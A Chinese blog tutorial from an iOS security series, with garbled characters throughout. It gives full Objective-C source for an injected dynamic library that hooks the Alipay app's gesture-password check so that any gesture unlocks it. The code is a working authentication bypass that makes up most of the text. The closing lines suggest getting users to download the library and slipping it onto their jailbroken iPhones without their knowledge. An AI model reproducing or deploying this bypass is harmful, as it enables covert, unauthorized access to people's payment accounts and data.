在 iOS 安全攻防(十一):Hack實(shí)戰(zhàn)——探究支付寶 app 手勢(shì)密碼中���,介紹了如何利用 gdb 分析 app �����,確定了支付寶 app 的手勢(shì)密碼格式為字符串�,9 個(gè)點(diǎn)分別對(duì)應(yīng) 123456789���。在 iOS 安全攻防(十二):iOS7 的動(dòng)態(tài)庫(kù)注入中�����,介紹了如果利用越獄大神們?yōu)槲覀冮_辟的 iOS7 動(dòng)態(tài)庫(kù)注入方法����。
本文將繼續(xù)深入 hack 實(shí)戰(zhàn),hook 支付寶手勢(shì)密碼校驗(yàn)操作��,欺騙其通過任意手勢(shì)輸入�����。
那么到現(xiàn)在為止���,我們已經(jīng)掌握了什么信息呢?
1)一個(gè)名叫 GestureUnlockViewController 的類�����,含有 gestureInputView:didFinishWithPassword: 方法���,來(lái)處理輸入的手勢(shì)
2)正確的手勢(shì)密碼通過一個(gè)名叫 GestureUtil 的類讀取�����,方法是 getPassword
思路馬上清晰了�����,我們需要做 2 步:
1)hook getPassword 存下正確的密碼
2)hook gestureInputView:didFinishWithPassword: 替換當(dāng)前輸入為正確的密碼
一個(gè)關(guān)鍵點(diǎn)�����,我們是用 Method Swizzling 來(lái) hook����,那么就意味操作不能過早,因?yàn)槲覀円WC在取到 GestureUnlockViewController 和 GestureUtil class 后���,才能進(jìn)行 imp 替換����。
所以��, 我采用 NSNotificationCenter 通知機(jī)制協(xié)助完成任務(wù)����。
#import <objc/runtime.h>
#import <UIKit/UIKit.h>
IMP ori_getPasswd_IMP = NULL;
IMP ori_gesture_IMP = NULL;
@interface NSObject (HackPortal)
@end
@implementation NSObject (HackPortal)
+ (id)getPassword
{
NSString *passwd = ori_getPasswd_IMP(self, @selector(getPassword));
return passwd;
}
- (void)gestureInputView:(id)view didFinishWithPassword:(id)password
{
password = ori_getPasswd_IMP(self, @selector(getPassword));
ori_gesture_IMP(self, @selector(gestureInputView:didFinishWithPassword:), view, password);
}
@end
@implementation PortalListener
- (id)init
{
self = [super init];
if (self) {
[[NSNotificationCenter defaultCenter]addObserver:self
selector:@selector(appLaunched:)
name:UIApplicationDidBecomeActiveNotification
object:nil];
}
return self;
}
- (void)appLaunched:(NSNotification *)notification
{
Class class_GestureUtil = NSClassFromString(@"GestureUtil");
Class class_PortalListener = NSClassFromString(@"PortalListener");
Method ori_Method = class_getClassMethod(class_GestureUtil, @selector(getPassword));
ori_getPasswd_IMP = method_getImplementation(ori_Method);
Method my_Method = class_getClassMethod(class_PortalListener, @selector(getPassword));
method_exchangeImplementations(ori_Method, my_Method);
Class class_Gesture = NSClassFromString(@"GestureUnlockViewController");
Method ori_Method1 = class_getInstanceMethod(class_Gesture,
@selector(gestureInputView:didFinishWithPassword:));
ori_gesture_IMP = method_getImplementation(ori_Method1);
Method my_Method1 = class_getInstanceMethod(class_PortalListener,
@selector(gestureInputView:didFinishWithPassword:));
method_exchangeImplementations(ori_Method1, my_Method1);
}
-(void)dealloc
{
[[NSNotificationCenter defaultCenter]removeObserver:self];
}
@end
static void __attribute__((constructor)) initialize(void)
{
static PortalListener *entrance;
entrance = [[PortalListener alloc]init];
}
OK��!編譯好動(dòng)態(tài)庫(kù)�����,塞進(jìn) iPhone 試試效果吧~
不管我們輸入什么手勢(shì)����,都會(huì)被替換為正確的密碼去給 gestureInputView:didFinishWithPassword: 驗(yàn)證���,然后順利解鎖�����。
這意味著什么呢?
意味著�����,我們可以通過正規(guī)的渠道讓用戶下載這個(gè)動(dòng)態(tài)庫(kù)����,然后悄悄放進(jìn)越獄的 iPhone 的 /Library/MobileSubstrate/DynamicLibraries/ 目錄下……然后……然后去給妹紙帥鍋?zhàn)兡g(shù)吧:“你看,我和你多心有靈犀��,你改什么密碼我都猜的到!”
